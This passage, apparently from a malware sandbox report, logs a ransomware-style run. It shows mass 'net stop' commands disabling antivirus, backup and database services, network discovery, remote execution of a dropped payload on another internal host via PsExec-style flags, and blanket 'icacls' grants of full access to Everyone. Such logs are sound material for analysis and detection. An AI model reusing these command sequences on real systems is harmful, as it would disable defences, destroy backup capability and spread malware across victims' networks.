    C:\Windows\system32\net1 stop “Sophos MCS Client” /y
    3⤵
    PID:15856
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop msexchangeimap4 /y
  2⤵
  PID:8640
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop msexchangeimap4 /y
    3⤵
    PID:5652
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “intel(r) proset monitoring service” /y
  2⤵
  PID:8632
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “intel(r) proset monitoring service” /y
    3⤵
    PID:15820
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSOLAP$TPSAMA /y
  2⤵
  PID:8620
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSOLAP$TPSAMA /y
    3⤵
    PID:13240
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop AcrSch2Svc /y
  2⤵
  PID:8612
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop AcrSch2Svc /y
    3⤵
    PID:16408
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Sophos MCS Agent” /y
  2⤵
  PID:8604
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos MCS Agent” /y
    3⤵
    PID:15828
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop msexchangeadtopology /y
  2⤵
  PID:8588
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop msexchangeadtopology /y
    3⤵
    PID:4884
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “aphidmonitorservice” /y
  2⤵
  PID:8580
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “aphidmonitorservice” /y
    3⤵
    PID:16520
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSOLAP$TPS /y
  2⤵
  PID:8568
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSOLAP$TPS /y
    3⤵
    PID:15848
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Zoolz 2 Service” /y
  2⤵
  PID:8560
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Zoolz 2 Service” /y
    3⤵
    PID:16480
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ReportServer$TPSAMA /y
  2⤵
  PID:8552
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ReportServer$TPSAMA /y
    3⤵
    PID:17168
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Sophos Health Service” /y
  2⤵
  PID:8544
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos Health Service” /y
    3⤵
    PID:16976
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSExchangeSRS /y
  2⤵
  PID:8536
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSExchangeSRS /y
    3⤵
    PID:5348
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop W3Svc /y
  2⤵
  PID:8528
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop W3Svc /y
    3⤵
    PID:17368
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSOLAP$SYSTEM_BGC /y
  2⤵
  PID:8520
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y
    3⤵
    PID:15296
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Veeam Backup Catalog Data Service” /y
  2⤵
  PID:8512
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Veeam Backup Catalog Data Service” /y
    3⤵
    PID:17376
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ReportServer$TPS /y
  2⤵
  PID:8500
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ReportServer$TPS /y
    3⤵
    PID:5084
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Sophos File Scanner Service” /y
  2⤵
  PID:8492
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos File Scanner Service” /y
    3⤵
    PID:16456
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSExchangeSA /y
  2⤵
  PID:8480
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSExchangeSA /y
    3⤵
    PID:5640
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop UI0Detect /y
  2⤵
  PID:8472
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop UI0Detect /y
    3⤵
    PID:5672
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSOLAP$SQL_2008 /y
  2⤵
  PID:8464
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y
    3⤵
    PID:6072
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Symantec System Recovery” /y
  2⤵
  PID:8456
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Symantec System Recovery” /y
    3⤵
    PID:16504
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ReportServer$SYSTEM_BGC /y
  2⤵
  PID:8448
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y
    3⤵
    PID:16352
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Sophos Device Control Service” /y
  2⤵
  PID:8440
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos Device Control Service” /y
    3⤵
    PID:17336
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSExchangeMTA /y
  2⤵
  PID:7540
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SstpSvc /y
  2⤵
  PID:7532
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop msftesql$PROD /y
  2⤵
  PID:7524
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “SQLsafe Filter Service” /y
  2⤵
  PID:7516
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ReportServer$SQL_2008 /y
  2⤵
  PID:7508
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SMTPSvc /y
  2⤵
  PID:7492
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Sophos Clean Service” /y
  2⤵
  PID:7484
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSExchangeMGMT /y
  2⤵
  PID:7476
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop POP3Svc /y
  2⤵
  PID:7468
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MsDtsServer110 /y
  2⤵
  PID:7460
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “SQLsafe Backup Service” /y
  2⤵
  PID:7452
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ReportServer /y
  2⤵
  PID:7440
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SamSs /y
  2⤵
  PID:7432
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Sophos AutoUpdate Service” /y
  2⤵
  PID:7424
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSExchangeIS /y
  2⤵
  PID:7416
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop NetMsmqActivator /y
  2⤵
  PID:7400
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MsDtsServer100 /y
  2⤵
  PID:7392
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “SQL Backups /y
  2⤵
  PID:7384
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Enterprise Client Service” /y
  2⤵
  PID:7368
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop EraserSvc11710 /y
  2⤵
  PID:7360
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Sophos Agent” /y
  2⤵
  PID:7344
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSExchangeES /y
  2⤵
  PID:7336
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop IISAdmin /y
  2⤵
  PID:7328
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MsDtsServer /y
  2⤵
  PID:7312
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Acronis VSS Provider” /y
  2⤵
  PID:7304
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop sophos /y
  2⤵
  PID:7288
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop CAARCUpdateSvc /y
  2⤵
  PID:7280
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop CASAD2DWebSvc /y
  2⤵
  PID:7264
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop AcronisAgent /y
  2⤵
  PID:7256
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop AcrSch2Svc /y
  2⤵
  PID:7248
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecRPCService /y
  2⤵
  PID:7232
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop vapiendpoint /y
  2⤵
  PID:7224
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop mssql$vim_sqlexp /y
  2⤵
  PID:7208
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop WRSVC /y
  2⤵
  PID:7200
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLTELEMETRY$ECWDB2 /y
  2⤵
  PID:7184
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop TrueKeyServiceHelper /y
  2⤵
  PID:7176
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLTELEMETRY /y
  2⤵
  PID:6344
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop TrueKeyScheduler /y
  2⤵
  PID:4380
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLSERVERAGENT /y
  2⤵
  PID:6336
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop TrueKey /y
  2⤵
  PID:3904
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLSafeOLRService /y
  2⤵
  PID:4764
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop tmlisten /y
  2⤵
  PID:3812
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLBrowser /y
  2⤵
  PID:6156
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop TmCCSF /y
  2⤵
  PID:5664
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$VEEAMSQL2012 /y
  2⤵
  PID:5912
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop swi_update_64 /y
  2⤵
  PID:7156
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
  2⤵
  PID:7148
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop swi_update /y
  2⤵
  PID:7132
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$TPSAMA /y
  2⤵
  PID:7124
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop swi_service /y
  2⤵
  PID:7108
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$TPS /y
  2⤵
  PID:7100
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop swi_filter /y
  2⤵
  PID:7092
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$SYSTEM_BGC /y
  2⤵
  PID:7084
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop svcGenericHost /y
  2⤵
  PID:7076
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$SQLEXPRESS /y
  2⤵
  PID:7068
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$SOPHOS /y
  2⤵
  PID:7060
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$SQL_2008 /y
  2⤵
  PID:7052
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop sophossps /y
  2⤵
  PID:7044
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$SHAREPOINT /y
  2⤵
  PID:7036
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SntpService /y
  2⤵
  PID:7028
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$SBSMONITORING /y
  2⤵
  PID:7020
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SmcService /y
  2⤵
  PID:7012
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$PROFXENGAGEMENT /y
  2⤵
  PID:7004
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop Smcinst /y
  2⤵
  PID:6996
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$PROD /y
  2⤵
  PID:6988
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ShMonitor /y
  2⤵
  PID:6980
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$PRACTTICEMGT /y
  2⤵
  PID:6972
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SepMasterService /y
  2⤵
  PID:6964
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$PRACTTICEBGC /y
  2⤵
  PID:6956
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SAVService /y
  2⤵
  PID:6948
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$ECWDB2 /y
  2⤵
  PID:6940
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SAVAdminService /y
  2⤵
  PID:6932
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$CXDB /y
  2⤵
  PID:6924
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop sacsvr /y
  2⤵
  PID:6916
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$CITRIX_METAFRAME /y
  2⤵
  PID:6908
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$SOPHOS /y
  2⤵
  PID:6900
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$BKUPEXEC /y
  2⤵
  PID:6892
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop sms_site_sql_backup /y
  2⤵
  PID:6884
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop mfevtp /y
  2⤵
  PID:6876
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop RESvc /y
  2⤵
  PID:6868
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop wbengine /y
  2⤵
  PID:6860
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop mfemms /y
  2⤵
  PID:6852
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ReportServer$SQL_2008 /y
  2⤵
  PID:6844
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.29
  2⤵
  PID:6004
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SavRoam /y
    3⤵
    PID:5784
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop wbengine /y
  2⤵
  PID:6836
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop mfefire /y
  2⤵
  PID:6828
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop OracleClientCache80 /y
  2⤵
  PID:6820
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamTransportSvc /y
  2⤵
  PID:6812
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MySQL80 /y
  2⤵
  PID:6796
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamRESTSvc /y
  2⤵
  PID:6788
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop McShield /y
  2⤵
  PID:6780
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MySQL57 /y
  2⤵
  PID:6772
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamNFSSvc /y
  2⤵
  PID:6764
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop McAfeeFrameworkMcAfeeFramework /y
  2⤵
  PID:6756
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQLServerOLAPService /y
  2⤵
  PID:6748
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamMountSvc /y
  2⤵
  PID:6740
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop McAfeeFramework /y
  2⤵
  PID:6732
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQLServerADHelper100 /y
  2⤵
  PID:6720
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamHvIntegrationSvc /y
  2⤵
  PID:6712
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop McAfeeEngineService /y
  2⤵
  PID:6704
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQLServerADHelper /y
  2⤵
  PID:6696
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamEnterpriseManagerSvc /y
  2⤵
  PID:6688
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MBEndpointAgent /y
  2⤵
  PID:6680
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQLSERVER /y
  2⤵
  PID:6672
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamDeploySvc /y
  2⤵
  PID:6664
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MBAMService /y
  2⤵
  PID:6656
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQLFDLauncher$TPSAMA /y
  2⤵
  PID:6648
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamDeploymentService /y
  2⤵
  PID:6640
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop masvc /y
  2⤵
  PID:6632
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQLFDLauncher$TPS /y
  2⤵
  PID:6624
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamCloudSvc /y
  2⤵
  PID:6616
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop macmnsvc /y
  2⤵
  PID:6608
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y
  2⤵
  PID:6600
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop EhttpSrv /y
  2⤵
  PID:6592
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop KAVFS /y
  2⤵
  PID:6192
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y
  2⤵
  PID:6184
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
  2⤵
  PID:6176
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop FA_Scheduler /y
  2⤵
  PID:6168
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$VEEAMSQL2012 /y
  2⤵
  PID:6160
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$VEEAMSQL2008R2 /y
  2⤵
  PID:5968
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop PDVFSService /y
  2⤵
  PID:4520
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop EsgShKernel /y
  2⤵
  PID:2004
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$TPSAMA /y
  2⤵
  PID:6060
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ntrtscan /y
  2⤵
  PID:5876
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop EPUpdateService /y
  2⤵
  PID:4136
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$TPS /y
  2⤵
  PID:5600
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$VEEAMSQL2008R2 /y
  2⤵
  PID:5944
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop EPSecurityService /y
  2⤵
  PID:4072
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$SYSTEM_BGC /y
  2⤵
  PID:5856
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop mozyprobackup /y
  2⤵
  PID:5228
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ekrn /y
  2⤵
  PID:5292
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$SQLEXPRESS /y
  2⤵
  PID:5744
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MMS /y
  2⤵
  PID:5800
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop Intuit.QuickBooks.FCS /y
  2⤵
  PID:4336
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop YooIT /y
  2⤵
  PID:5116
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop YooBackup /y
  2⤵
  PID:5204
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBFCService /y
  2⤵
  PID:6112
- C:\Users\Admin\AppData\Local\Temp\yrbyuioh.exe
  "C:\Users\Admin\AppData\Local\Temp\yrbyuioh.exe" \\10.10.0.29 -d -f -h -s -n 5 -c "C:\Users\Admin\AppData\Local\Temp\936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd.exe"
  2⤵
  - Executes dropped EXE
  PID:15088
- C:\Windows\SYSTEM32\arp.exe
  "arp" -a
  2⤵
  PID:12240
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.25
  2⤵
  PID:12016
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.29
  2⤵
  PID:12096
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp7DCC.bat
  2⤵
  PID:13052
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA\VSTOFiles.cat /grant Everyone:F /T /C /Q
  2⤵
  PID:14548
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\vcredist2010_x64.log-MSI_vc_red.msi.txt /grant Everyone:F /T /C /Q
  2⤵
  PID:16992
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\vcredist2010_x64.log.html /grant Everyone:F /T /C /Q
  2⤵
  PID:16996
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\vcredist2012_x64_0_vcRuntimeMinimum_x64.log /grant Everyone:F /T /C /Q
  2⤵
  PID:13920
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\vcredist2012_x64_1_vcRuntimeAdditional_x64.log /grant Everyone:F /T /C /Q
  2⤵
  PID:6536
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\vcredist2013_x64_000_vcRuntimeMinimum_x64.log /grant Everyone:F /T /C /Q
  2⤵
  PID:6444
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\vcredist2013_x64_001_vcRuntimeAdditional_x64.log /grant Everyone:F /T /C /Q
  2⤵
  PID:4148
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\vcredist2019_x64_000_vcRuntimeMinimum_x64.log /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:6992
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\vcredist2019_x64_001_vcRuntimeAdditional_x64.log /grant Everyone:F /T /C /Q
  2⤵
  PID:6976
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\Public\Libraries\RecordedTV.library-ms /grant Everyone:F /T /C /Q
  2⤵
  PID:9472
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag /grant Everyone:F /T /C /Q
  2⤵
  PID:9672
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Licensing Component.swidtag /grant Everyone:F /T /C /Q
  2⤵
  PID:9624
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag /grant Everyone:F /T /C /Q
  2⤵
  PID:9036
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft_Windows-10-Pro.swidtag /grant Everyone:F /T /C /Q
  2⤵
  PID:7588
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}v14.21.27702\packages\vcRuntimeMinimum_amd64\cab1.cab /grant Everyone:F /T /C /Q
  2⤵
  PID:5520
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\state.rsm /grant Everyone:F /T /C /Q
  2⤵
  PID:13388
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\vcRuntimeMinimum_amd64\cab1.cab /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:9332
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\state.rsm /grant Everyone:F /T /C /Q
  2⤵
  PID:7368
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{CB0836EC-B072-368D-82B2-D3470BF95707}v12.0.40660\packages\vcRuntimeMinimum_amd64\cab1.cab /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:13856
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\state.rsm /grant Everyone:F /T /C /Q
  2⤵
  PID:12868
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}v12.0.40660\packages\vcRuntimeAdditional_amd64\cab1.cab /grant Everyone:F /T /C /Q
  2⤵
  PID:13476
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64\cab1.cab /grant Everyone:F /T /C /Q
  2⤵
  PID:9372
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\vcRuntimeAdditional_amd64\cab1.cab /grant Everyone:F /T /C /Q
  2⤵
  PID:13552
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Oracle\Java\java.settings.cfg /grant Everyone:F /T /C /Q
  2⤵
  PID:14544
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Oracle\Java\installcache_x64\baseimagefam8 /grant Everyone:F /T /C /Q
  2⤵
  PID:14528
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Security Health\Logs\SHS-10282020-181633-3-1-15063.0.amd64fre.rs2_release.170317-1834.bin /grant Everyone:F /T /C /Q
  2⤵
  PID:14892
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Security Health\Logs\SHS-10282020-181801-3-1-15063.0.amd64fre.rs2_release.170317-1834.bin /grant Everyone:F /T /C /Q
  2⤵
  PID:6176
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Security Health\Logs\SHS-10282020-182044-3-1-15063.0.amd64fre.rs2_release.170317-1834.bin /grant Everyone:F /T /C /Q
  2⤵
  PID:14836
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Security Health\Logs\SHS-10282020-182302-3-1-15063.0.amd64fre.rs2_release.170317-1834.bin /grant Everyone:F /T /C /Q
  2⤵
  PID:5716
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSScan\WelcomeScan.jpg /grant Everyone:F /T /C /Q
  2⤵
  PID:10476
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\VirtualInbox\en-US\WelcomeFax.tif /grant Everyone:F /T /C /Q
  2⤵
  PID:17080
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\confident.cov /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:14596
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\fyi.cov /grant Everyone:F /T /C /Q
  2⤵
  PID:7420
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\generic.cov /grant Everyone:F /T /C /Q
  2⤵
  PID:13576
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\urgent.cov /grant Everyone:F /T /C /Q
  2⤵
  PID:7072
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows Live\WLive48x48.png /grant Everyone:F /T /C /Q
  2⤵
  PID:7452
- C:\Windows\SYSTEM32\icacls.exe
